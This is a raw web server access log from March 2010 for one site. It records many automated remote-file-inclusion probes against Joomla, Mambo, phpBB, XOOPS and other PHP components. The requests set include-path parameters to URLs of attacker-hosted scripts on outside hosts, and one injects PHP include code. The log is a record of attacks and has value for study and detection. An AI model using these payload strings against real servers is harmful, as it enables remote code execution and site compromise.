65.18.192.91 - - [12/Mar/2010:08:52:21 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [12/Mar/2010:08:52:22 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 200 15069 "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [12/Mar/2010:08:52:23 -0800] "GET /logs/access_080810.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [12/Mar/2010:08:52:23 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
164.77.228.201 - - [12/Mar/2010:08:52:24 -0800] "GET /logs/access_080710.log//index.php?name=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [12/Mar/2010:08:52:24 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 200 15069 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:08:52:26 -0800] "GET /logs/access_080607.log///components/com_mambowiki/Mambologin.php?dir=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [12/Mar/2010:08:52:32 -0800] "GET /logs/access_080330.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
65.18.192.91 - - [12/Mar/2010:08:52:34 -0800] "GET /logs/access_080330.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://hepclassic.com/templates/js_lush_001/images/leftcorner.png??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:08:52:40 -0800] "GET /logs/access_080607.log%20%20///components/com_mambowiki/Mambologin.php?dir=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
123.143.29.250 - - [12/Mar/2010:08:53:12 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.gogos.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
123.143.29.250 - - [12/Mar/2010:08:53:12 -0800] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.gogos.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
123.143.29.250 - - [12/Mar/2010:08:53:12 -0800] "GET /logs/access_100228.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.gogos.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:08:53:13 -0800] "GET /logs/access_080707.log%20%20/index1.php?menu=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:08:53:26 -0800] "GET /logs/access_080614.log%20%20/index1.php?menu=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
199.120.90.223 - - [12/Mar/2010:08:53:28 -0800] "GET /html//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.certifiedannuityconsultant.com/WebCal//tools/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
199.120.90.223 - - [12/Mar/2010:08:53:28 -0800] "GET /logs//html//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.certifiedannuityconsultant.com/WebCal//tools/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
199.120.90.223 - - [12/Mar/2010:08:53:30 -0800] "GET /logs/access_080214.log%20%20//html//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.certifiedannuityconsultant.com/WebCal//tools/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
212.241.177.123 - - [12/Mar/2010:08:54:00 -0800] "GET /components/com_fabrik/libs/Blowfish/PHP.php?mosConfig.absolute.path=http://www.ballymenagolfclub.com//components/com_fabrik/js/AinuLid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
212.241.177.123 - - [12/Mar/2010:08:54:01 -0800] "GET /logs/access_090707.log//components/com_fabrik/libs/Blowfish/PHP.php?mosConfig.absolute.path=http://www.ballymenagolfclub.com//components/com_fabrik/js/AinuLid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
212.241.177.123 - - [12/Mar/2010:08:54:01 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/PHP.php?mosConfig.absolute.path=http://www.ballymenagolfclub.com//components/com_fabrik/js/AinuLid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
123.143.29.250 - - [12/Mar/2010:08:54:03 -0800] "GET /logs/access_090625.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.gogos.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
121.101.214.54 - - [12/Mar/2010:08:54:03 -0800] "GET /logs//inc/header.php/step_one.php?server_inc=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
121.101.214.54 - - [12/Mar/2010:08:54:03 -0800] "GET /inc/header.php/step_one.php?server_inc=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
121.101.214.54 - - [12/Mar/2010:08:54:03 -0800] "GET /logs/access_090712.log%20%20//inc/header.php/step_one.php?server_inc=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.217.76.226 - - [12/Mar/2010:08:54:08 -0800] "GET /mod_mainmenu.php?mosConfig_absolute_path=http://www.tribal-zone.fr//administrator/components/com_virtuemart/sql/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.217.76.226 - - [12/Mar/2010:08:54:08 -0800] "GET /logs/access_081019.log//mod_mainmenu.php?mosConfig_absolute_path=http://www.tribal-zone.fr//administrator/components/com_virtuemart/sql/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.217.76.226 - - [12/Mar/2010:08:54:08 -0800] "GET /logs//mod_mainmenu.php?mosConfig_absolute_path=http://www.tribal-zone.fr//administrator/components/com_virtuemart/sql/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.217.76.226 - - [12/Mar/2010:08:54:09 -0800] "GET /logs/access_080303.log//mod_mainmenu.php?mosConfig_absolute_path=http://www.tribal-zone.fr//administrator/components/com_virtuemart/sql/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
199.120.90.223 - - [12/Mar/2010:08:54:14 -0800] "GET /logs/access_080211.log%20%20//html//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://www.certifiedannuityconsultant.com/WebCal//tools/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
121.101.214.54 - - [12/Mar/2010:08:54:19 -0800] "GET /logs/access_090626.log%20%20//inc/header.php/step_one.php?server_inc=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.217.76.226 - - [12/Mar/2010:08:54:40 -0800] "GET /logs//mod_mainmenu.php?mosConfig_absolute_path=http://www.tribal-zone.fr//administrator/components/com_virtuemart/sql/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.217.76.226 - - [12/Mar/2010:08:54:41 -0800] "GET /mod_mainmenu.php?mosConfig_absolute_path=http://www.tribal-zone.fr//administrator/components/com_virtuemart/sql/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.217.76.226 - - [12/Mar/2010:08:54:41 -0800] "GET /logs/access_080501.log%20%20//mod_mainmenu.php?mosConfig_absolute_path=http://www.tribal-zone.fr//administrator/components/com_virtuemart/sql/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.217.76.226 - - [12/Mar/2010:08:54:41 -0800] "GET /logs/access_080706.log%20%20//mod_mainmenu.php?mosConfig_absolute_path=http://www.tribal-zone.fr//administrator/components/com_virtuemart/sql/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:08:54:43 -0800] "GET /logs/access_071120.log%20%20//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:08:54:44 -0800] "GET /logs/access_071106.log%20%20//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:08:55:02 -0800] "GET /logs/access_071120.log%20%20//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:08:55:02 -0800] "GET /logs/access_071106.log%20%20//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:08:55:02 -0800] "GET /logs/access_071106.log%20%20//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:08:55:02 -0800] "GET /logs/access_071120.log%20%20//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:08:55:02 -0800] "GET /logs/access_071106.log%20%20//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:08:55:02 -0800] "GET /logs/access_071120.log%20%20//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
121.101.214.54 - - [12/Mar/2010:08:55:18 -0800] "GET /logs/access_090712.log//inc/header.php/step_one.php?server_inc=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:08:55:20 -0800] "GET /logs/access_090516.log/xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:08:55:27 -0800] "GET /xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:08:55:27 -0800] "GET /logs/access_090516.log/xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
121.101.214.54 - - [12/Mar/2010:08:55:32 -0800] "GET /logs/access_090626.log//inc/header.php/step_one.php?server_inc=http://naturalstory.net/bbs/data/notice/.httpd/filesys/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:08:55:35 -0800] "GET /logs/xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:08:55:35 -0800] "GET /logs/access_090516.log%20%20/xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:08:55:40 -0800] "GET /xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:08:55:40 -0800] "GET /logs/xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:08:55:41 -0800] "GET /xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:08:55:42 -0800] "GET /logs/xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:08:55:45 -0800] "GET /xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:08:55:47 -0800] "GET /xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:08:55:53 -0800] "GET /logs/xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:08:55:53 -0800] "GET /logs/access_090516.log%20%20/xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:08:55:53 -0800] "GET /xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:08:55:55 -0800] "GET /logs/access_090516.log/xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:08:55:55 -0800] "GET /xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:08:55:57 -0800] "GET /logs/xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
220.80.108.81 - - [12/Mar/2010:08:55:59 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.hyonsvc.co.kr//bbs//icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
220.80.108.81 - - [12/Mar/2010:08:56:00 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.hyonsvc.co.kr//bbs//icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
220.80.108.81 - - [12/Mar/2010:08:56:00 -0800] "GET /logs/access_081125.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.hyonsvc.co.kr//bbs//icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:08:56:01 -0800] "GET /logs/xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:08:56:01 -0800] "GET /logs/access_090516.log%20%20/xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [12/Mar/2010:08:56:04 -0800] "GET /xoops_lib/modules/protector/oninstall.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://nic.bupt.edu.cn/media/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
220.80.108.81 - - [12/Mar/2010:08:56:08 -0800] "GET /logs/access_090503.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.hyonsvc.co.kr//bbs//icon/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
212.241.177.123 - - [12/Mar/2010:08:56:15 -0800] "GET /components/com_fabrik/libs/Blowfish/PHP.php?mosConfig.absolute.path=http://www.ballymenagolfclub.com//components/com_fabrik/js/AinuLid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
212.241.177.123 - - [12/Mar/2010:08:56:15 -0800] "GET /logs/access_090707.log//components/com_fabrik/libs/Blowfish/PHP.php?mosConfig.absolute.path=http://www.ballymenagolfclub.com//components/com_fabrik/js/AinuLid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
212.241.177.123 - - [12/Mar/2010:08:56:15 -0800] "GET /logs//components/com_fabrik/libs/Blowfish/PHP.php?mosConfig.absolute.path=http://www.ballymenagolfclub.com//components/com_fabrik/js/AinuLid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:08:56:49 -0800] "GET /logs/access_071114.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.179.177.167 - - [12/Mar/2010:08:56:57 -0800] "GET /logs/access_090209.log%20%20/environment.php?DIR_PREFIX=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.179.177.167 - - [12/Mar/2010:08:56:57 -0800] "GET /environment.php?DIR_PREFIX=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
210.179.177.167 - - [12/Mar/2010:08:56:57 -0800] "GET /logs/environment.php?DIR_PREFIX=http://www.frentesdeseguridad.gov.co/components/lang/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.228.220.59 - - [12/Mar/2010:08:56:59 -0800] "GET /logs/access_100112.log//contents/community/faq_list.php///index.php?_SERVER[DOCUMENT_ROOT]=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.228.220.59 - - [12/Mar/2010:08:56:59 -0800] "GET /contents/community/faq_list.php///index.php?_SERVER[DOCUMENT_ROOT]=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.228.220.59 - - [12/Mar/2010:08:57:00 -0800] "GET /logs//contents/community/faq_list.php///index.php?_SERVER[DOCUMENT_ROOT]=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:08:57:00 -0800] "GET /logs/access_071114.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.228.220.59 - - [12/Mar/2010:08:57:02 -0800] "GET /logs//contents/community/faq_list.php///index.php?_SERVER[DOCUMENT_ROOT]=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.228.220.59 - - [12/Mar/2010:08:57:02 -0800] "GET /logs/access_100112.log%20%20//contents/community/faq_list.php///index.php?_SERVER[DOCUMENT_ROOT]=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.228.220.59 - - [12/Mar/2010:08:57:02 -0800] "GET /contents/community/faq_list.php///index.php?_SERVER[DOCUMENT_ROOT]=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.195.115.221 - - [12/Mar/2010:08:57:05 -0800] "GET /logs/access_090430.log HTTP/1.0" 200 4926264 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:08:57:12 -0800] "GET /logs/access_071114.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.228.220.59 - - [12/Mar/2010:08:57:13 -0800] "GET /logs//contents/community/faq_list.php///index.php?_SERVER[DOCUMENT_ROOT]=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.228.220.59 - - [12/Mar/2010:08:57:13 -0800] "GET /contents/community/faq_list.php///index.php?_SERVER[DOCUMENT_ROOT]=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.228.220.59 - - [12/Mar/2010:08:57:13 -0800] "GET /logs/access_100112.log//contents/community/faq_list.php///index.php?_SERVER[DOCUMENT_ROOT]=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
211.43.212.49 - - [12/Mar/2010:08:57:16 -0800] "GET /logs/access_071114.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
123.143.29.250 - - [12/Mar/2010:08:57:28 -0800] "GET /include/bbs.lib.inc.php?site_path=http://www.gogos.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
123.143.29.250 - - [12/Mar/2010:08:57:28 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.gogos.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
123.143.29.250 - - [12/Mar/2010:08:57:28 -0800] "GET /logs/access_080619.log//include/bbs.lib.inc.php?site_path=http://www.gogos.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
118.129.170.49 - - [12/Mar/2010:08:57:53 -0800] "GET /logs/access_081021.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tribal-zone.fr//administrator/components/com_virtuemart/sql/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
118.129.170.49 - - [12/Mar/2010:08:57:53 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tribal-zone.fr//administrator/components/com_virtuemart/sql/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
118.129.170.49 - - [12/Mar/2010:08:57:53 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tribal-zone.fr//administrator/components/com_virtuemart/sql/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
118.129.170.49 - - [12/Mar/2010:08:58:08 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tribal-zone.fr//administrator/components/com_virtuemart/sql/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
118.129.170.49 - - [12/Mar/2010:08:58:08 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tribal-zone.fr//administrator/components/com_virtuemart/sql/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
118.129.170.49 - - [12/Mar/2010:08:58:08 -0800] "GET /logs/access_081021.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tribal-zone.fr//administrator/components/com_virtuemart/sql/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
67.195.115.221 - - [12/Mar/2010:08:58:12 -0800] "GET /logs/access_080504.log HTTP/1.0" 200 2844294 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
118.129.170.49 - - [12/Mar/2010:08:58:13 -0800] "GET /logs/access_091125.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.tribal-zone.fr//administrator/components/com_virtuemart/sql/Oid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
